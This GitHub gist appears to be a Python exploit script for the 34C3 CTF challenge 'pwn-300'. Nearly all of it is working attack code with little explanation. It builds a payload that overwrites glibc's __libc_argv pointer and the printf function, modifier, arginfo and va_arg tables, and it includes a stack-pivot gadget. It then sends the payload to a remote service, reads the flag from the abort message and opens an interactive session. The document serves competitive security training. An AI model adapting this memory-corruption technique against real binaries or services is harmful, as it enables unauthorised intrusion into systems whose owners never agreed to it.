Skip to content

Instantly share code, notes, and snippets.

@hhc0null
Created December 29, 2017 20:58
Show Gist options
  • Save hhc0null/926bf931e50a920edf2f33d423ba481f to your computer and use it in GitHub Desktop.
Save hhc0null/926bf931e50a920edf2f33d423ba481f to your computer and use it in GitHub Desktop.
34C3: pwn-300
#!/usr/bin/env python
from pathlib import PurePath, Path
from tempfile import NamedTemporaryFile
from itertools import islice, cycle
from hexdump import hexdump as hd
import binascii
import hashlib
import re
import os
import shlex
import socket
import string
import struct
import subprocess
import sys
import time
import telnetlib
from random import choice
from string import ascii_letters, digits
# Utilities
def p(x, length=1, byteorder='little', signed=False):
return int.to_bytes(x, length, byteorder, signed=signed)
def p64(x):
return p(x, length=8)
def p32(x):
return p(x, length=4)
def u(x, byteorder='little', signed=False):
return int.from_bytes(x, byteorder, signed=signed)
# Additional
def pad(data, length):
return bytes(islice(cycle(data), length))
'''
def a2n(s):
return socket.inet_aton(s)
def n2a(s):
return socket.inet_ntoa(s)
'''
def nasm(code, bits=64):
asmcode = ("BITS {:d}\n{:s}".format(bits, code))
source = NamedTemporaryFile(prefix='shellcode-', suffix='.s', delete=False)
srcpath = source.name
source.write(asmcode.encode())
source.close()
cmd = 'nasm {:s}'.format(str(source.name))
r = subprocess.run(cmd, shell=True, stdout=subprocess.PIPE)
o = Path(PurePath(source.name).with_suffix(''))
shellcode = o.read_bytes()
return shellcode
def _dp(data):
global _debug
if not _debug:
return False
print('[DEBUG] - raw\n', data, file=sys.stderr)
return True
# Communicators
def read_until(f, delim='\n'):
data = ""
while not data.endswith(delim):
data += f.read(1)
return data
def connect(rhp):
s = socket.create_connection(rhp)
f = s.makefile('rw')
print('[+] Connected to {:s}:{:d}'.format(*rhp))
return s, f
def interact(s):
t = telnetlib.Telnet()
t.sock = s
print('[+] Entering to interactive mode...')
t.interact()
### user-defined
class IO(object):
def __init__(self, rhp):
self.rhp = rhp
self.s, self.f = connect(self.rhp)
def _read(self, size):
return self.s.recv(size)
def _write(self, buf):
self.s.send(buf)
def read(self, size=1):
return self._read(size)
def write(self, buf, end=b''):
self._write(buf+end)
def writeln(self, buf):
self.write(buf, end=b'\n')
def read_until(self, delim=b'\n'):
buf = b''
while not buf.endswith(delim):
buf += self._read(1)
return buf
def flush(self):
self.f.flush()
def interact(self):
interact(self.s)
def close(self):
self.f.close()
self.s.close()
class RRIO(IO):
def __init__(self, rhp, debug=False):
self.debug = debug
super(RRIO, self).__init__(rhp)
#data = self.read_until()
#_dp(data)
class Pwn(object):
def attack(self, ip, port, local=False):
main(ip, port, local)
def main(ip, port, local):
if local:
pass
addr_name = 0x00000000006b73e0
data = b''.join((
# 1765: 00000000006b7980 8 OBJECT GLOBAL DEFAULT 24 __libc_argv
b'_'*(0x00000000006b7980-addr_name), # padding
p64(0x00000000006b7ab8),
b'_'*(0x00000000006b7a28-0x00000000006b7988), # padding
p64(0x00000000006b7ab0-0x73*8), # 1509: 00000000006b7a28 8 OBJECT GLOBAL DEFAULT 24 __printf_function_table
p64(addr_name+0x800), # 846: 00000000006b7a30 8 OBJECT GLOBAL DEFAULT 24 __printf_modifier_table
b'_'*(0x00000000006b7aa8-0x00000000006b7a38), # padding
p64(addr_name+0x800-0x73*8), # 1335: 00000000006b7aa8 8 OBJECT GLOBAL DEFAULT 25 __printf_arginfo_table
p64(0x40164e), # 0x00434162: pop rsp ; jmp rax ; # 1808: 00000000006b7ab0 8 OBJECT GLOBAL DEFAULT 25 __printf_va_arg_table
p64(0x6b4040),
))
rrio = RRIO((ip, port,))
rrio.writeln(data)
out = rrio.read_until()
the_flag = re.search(r"Error in \`([^']+)'", out.decode()).groups(1)[0]
print('[+] The flag is: '+the_flag)
rrio.interact()
if __name__ == '__main__':
_debug = False
try:
import fire
fire.Fire(Pwn)
except:
main(sys.argv[1], int(sys.argv[2]), len(sys.argv) > 3)
'''
'''
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment